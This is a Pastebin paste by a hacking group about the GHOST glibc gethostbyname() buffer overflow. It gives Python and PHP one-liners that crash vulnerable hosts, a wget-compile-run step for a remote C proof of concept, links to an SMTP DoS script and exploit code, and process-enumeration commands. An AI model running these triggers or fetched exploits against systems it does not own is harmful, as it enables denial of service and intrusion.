Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We are...
- _____ _________
- / _ \ ____ ____ ____ / _____/ ____ ____
- / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- / | \ | ( <_> ) | \/ \ ___/\ \___
- \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- \/ \/ \/ \/ \/ \/
- //Laughing at your security since 2012*
- =================================================================================================
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
- - Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
- - Razar - MR.WWW - AN0NT0XIC
- =================================================================================================
- [+] Check if vuln to Ghost: glibc gethostbyname() buffer overflow via Python, PHP, C and Shell [+]
- [+] Python [+]
- `python -c "print '0' * $((0x10000 - 16 * 1 - 2 * 4 - 1 - 4))" `
- Segmentation fault
- echo $?
- [+] PHP [+]
- php -r '$e="0″;for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);' Segmentation fault
- [+] C [+]
- wget http://pastebin.com/raw.php?i=7LFRPczm -O ghost.c
- gcc ghost.c -O ghost
- ./ghost
- [+] ghost-smtp-dos.py [+]
- http://pastebin.com/QmngpTdy
- [+] GhostFlow.c - Ghost BufferOverflow [+]
- http://pastebin.com/7LFRPczm
- [+] Ghost.sh [+]
- http://pastebin.com/y9xGNrBi
- [+] Check your libc version [+]
- ldd --version
- Here is a list of potential targets that we investigated (they all call
- gethostbyname, one way or another), but to the best of our knowledge,
- the buffer overflow cannot be triggered in any of them:
- apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
- nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
- pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
- vsftpd, xinetd.
- [+] Find Processes Dependant on glibc [+]
- lsof | grep libc | awk '{print $1}' | sort | uniq
- lsof | awk '/libc/{print $1 | "sort -u" }' you're welcome
- netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u
- sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'
- [+] Code Analysis [+]
- gethostbyname() and friends fill in struct hostent:
- struct hostent {
- char *h_name; /* official name of host */
- char **h_aliases; /* alias list */
- int h_addrtype; /* host address type */
- int h_length; /* length of address */
- char **h_addr_list; /* list of addresses */
- }
- 101 *buffer_size = size_needed;
- 102 new_buf = (char *) realloc (*buffer, *buffer_size);
- 103
- 104 if (new_buf == NULL)
- 105 {
- ...
- 114 goto done;
- 115 }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement